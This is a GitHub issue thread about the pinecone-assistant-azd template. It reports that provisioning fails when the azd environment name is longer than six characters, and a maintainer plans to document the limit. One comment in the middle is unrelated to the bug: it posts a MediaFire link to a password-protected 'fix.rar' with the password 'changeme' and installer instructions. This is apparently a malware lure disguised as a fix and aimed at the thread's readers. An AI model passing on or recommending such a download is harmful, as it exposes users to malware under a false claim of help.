### ISSUE TITLE
[Bug] Env name cannot be longer than 6

### ISSUE THREAD

**Issue by puicchan** [pinecone-io/pinecone-assistant-azd#17]
### Is this a new bug?

- [X] I believe this is a new bug
- [X] I have searched the existing issues, and I could not find an existing issue for this bug

### Current Behavior

Unable to `azd provision` because I specified an azd environment name ("pcasst823") that is > 6 in length.

### Expected Behavior

Either catch the issue in preprovision hook or include in readme text to ask customer to provide an environment that is <= 6 in length. Perhaps include this in troubleshooting steps as well.

### Steps To Reproduce

1. Create new Codespace
2. Follow instructions in readme
3. Run `azd provision`

### Relevant log output

```shell
ERROR: deployment failed: error deploying infrastructure: starting deployment to subscription: PUT https://management.azure.com/subscriptions/xxxxxxx/providers/Microsoft.Resources/deployments/pcasst823-1724452596
		--------------------------------------------------------------------------------
		RESPONSE 400: 400 Bad Request
		ERROR CODE: InvalidTemplate
		--------------------------------------------------------------------------------
		{
		  "error": {
		    "code": "InvalidTemplate",
		    "message": "Deployment template validation failed: 'The provided value for the template parameter 'environmentName' is not valid. Length of the value should be less than or equal to '6'. Please see https://aka.ms/arm-syntax-parameters for usage details.'.",
		    "additionalInfo": [
		      {
		        "type": "TemplateViolation",
		        "info": {
		          "lineNumber": 1,
		          "linePosition": 2354,
		          "path": "properties.template.parameters.environmentName.maxLength"
		        }
		      }
		    ]
		  }
		}
```

### Environment

```markdown
I created Codespace on main.
```

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by cwaddingham** [comment]
Good call out, I'll add something to the README to avoid the hooks getting more cumbersome than they already are. It would be nice if `azd provision` itself handled this check, though.
